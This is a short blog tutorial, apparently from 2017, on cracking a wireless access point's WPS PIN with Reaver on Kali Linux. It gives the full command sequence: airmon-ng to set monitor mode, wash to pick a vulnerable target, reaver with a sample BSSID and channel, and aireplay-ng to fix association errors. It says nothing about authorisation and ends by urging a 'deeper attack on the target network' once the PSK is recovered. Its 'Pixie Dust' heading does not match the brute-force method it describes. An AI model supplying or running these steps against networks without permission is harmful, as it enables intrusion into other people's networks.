Monday, 30 January 2017

WPS Wi-Fi Testing using Reaver in Kali Linux


Pixie Dust Attack

Let’s start!


Requirement - 

1. Kali Linux running machine.

2. Wi-Fi moniter mode supporting USB external adapter (Click here for more info)

Open your Terminals - 

Enable wireless card monitor mode - 

Assuming you have a capable card, let’s switch it from managed to monitor mode. Kill all processes that can interrupt monitor mode:

# airmon-ng check kill
Enable monitor mode:

# airmon-ng start wlan0

If you don’t know which interface your wireless card is, issue the command iwconfig or ifconfig or ip addr show. 

Wireless interfaces are marked IEEE 802.11bgn. Your wireless card would probably be named wlan0 or something similar.

Airmon will create a new interface called wlan0mon, which is your wlan0 but in monitor mode.


We will use wash command to find a WPS vulnerable access point.

# wash -i wlan0mon

If you encoutner [!] Found packet with bad FCS, skipping... error, try:

# wash -i wlan0mon --ignore-fcs

Wash will then show APs with WPS enabled. Now if you see a WPS Locked with No value, that means the AP is WPS vulnerable.

Select your target AP and take note of its BSSID and Channel.

Launch the attack - 

Now that we have the valuable data of our target AP, we can proceed on launching the attack: 

reaver -i wlan0mon -b <BSSID> -c <channel> -a -vv

# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv

where -a tells reaver to automatically adjust base on the target’s behaviour and -vv is for verbosity. 

Check reaver --help for more options.

Some wireless cards, like the Alfa AWUS036NH I used, encounter an association error. You can fix this by opening another terminal and do the association with:

# aireplay-ng -1 0 -a <BSSID> <interface>

Then modify your reaver command by adding -A argument, meaning that the association is done in a separate process:

# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv -A



Another thing to look out for is when you get M5 right away and get a timeout error when sending the M6 message. 
It might be that the target AP indeed has WPS enbled but is not configured. 

Don’t waste your time on this AP, I’ve tried it and reaver will never get the PIN.

If you’re receiving NACK messages, it means AP is responding to WPS requests as expected.

It will take around 10 hours or even days depending on the signal strength for reaver to crack the PIN. 

The good thing is you can pause reaver (Ctrl+C) and resume the attack in another time. You can leave Reaver running during the night if you wish.


Once Reaver has cracked the PIN, it will show the PSK of the AP. You can now connect to it and perform a deeper attack on the target network.

Have a safe hack.


You may want to see my other tutorials - 














No comments:

Post a Comment